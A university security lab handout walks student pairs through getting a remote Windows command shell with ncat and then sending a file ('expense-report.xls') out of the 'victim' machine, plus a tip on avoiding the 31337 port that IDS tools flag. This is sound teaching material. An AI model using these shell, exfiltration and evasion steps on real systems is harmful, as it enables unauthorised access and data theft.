Shell lab SP17 DBGrevised (1)
Last updated
Last updated
Getting a command (CMD) shell
Objective: Understand how APT allows access into a corporate network.
Scenario: Two systems that can directly communicate to each other on an arbitrary port (ie. there's no firewall or other device preventing them from communicating directly to each other.) Alice is the victim and Eve is the attacker so one of you will be Alice for the duration of the assignment and other one Eve. When the first person is done, switch roles.
Preparation:
Ensure the two Windows workstations can ping each other.
Make a note of each other’s IP address.
192.168.3.27
Download and install
Start a command prompt (cmd.exe)
Change directory to the nmap install dir (cd “C:\Program Files (x86)\Nmap”)
Each system (i.e. both alice and eve) type hostname into the command prompt so you know the hostname of each.
On Alice’s computer, a listener (-l) (lower case L) is started on port 8001 and anyone that connects to it will get a command prompt on Alice's computer. The -v is for verbose mode. It is always a good option so you know what is going on as the shell is being setup.
Alice (on Windows): ncat -l 8001 -e cmd.exe -v
Eve Connects to Alice's computer on port 8001.
ncat X.X.X.X 8001 Replace X.X.X.X with the IP address of Alice’s computer.
Eve should now see something like this:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Alice
Eve is now logged into Alice's system and can type commands as if he was sitting in front of her computer.
Run the command: hostname
you should see the computer name of the windows system. Additionally, the command:
ipconfig /all which should display the IP address of the windows system of your Partner.
Optional DATA EXFILTRATION
Objective: Understand how Advanced Persistent Threat (APT) exfiltrates (retrieve) data from an organizations.
Scenario: Assuming two systems can directly communicate to each other on an arbitrary port (ie. there's no firewall or other device preventing them from communicating directly to each other.) Alice is the victim and Eve is the attacker.
Attackers often browse around the computer system and compress and transfer files to a remote system. This demonstrates that capability using NCAT.
Preparation: Re-establish a shell on your partner’s system (from the previous lab).
Alice: Download the “expense-report.xls” file from Canvas and save it to the Downloads folder, which it should by default.
Eve, should have an ncat session open on Alice’s host (from the previous lab). Using access to Alice’s cmd, Eve is going to open another connection from Alice’s computer on port 4000
Eve (run this command on Alice’s computer):
ncat -vv -l 4000 --send-only < %USERPROFILE%\Downloads\expense-report.xls
The < is a redirect indicating that when someone connects they will be sent the file
%USERPROFILE% substitutes the user home directory path
Eve: Open a new command prompt on your workstation and run the commands:
Browse to your Downloads directory
Type dir to see the contents
In the “dir” command above, look for the expense-report.xls file before running the command below. It should not be there:
Eve: ncat -vv host1 4000 > expense-report.xls (Replace “host1” with the IP address of Alice’s workstation.). This will connect to the new server at port 4000 and redirect the file to Eve’s computer.
Eve: Browse to your Downloads folder and see if you see the “expense-report.xls” file AND can open it.
Using the backdoor connection to Alice, Eve was able to open up a connection she could use to transfer files out of Alice’s computer.
INFORMATIONAL ONLY: Always specify a port number. Otherwise, ncat will default to using port 31337. That is a well-known Trojan port and could trigger an alert which an Intrusion Detection System or firewall may alert on. The type of attackers that ‘persist’ in networks, would hide their existence.
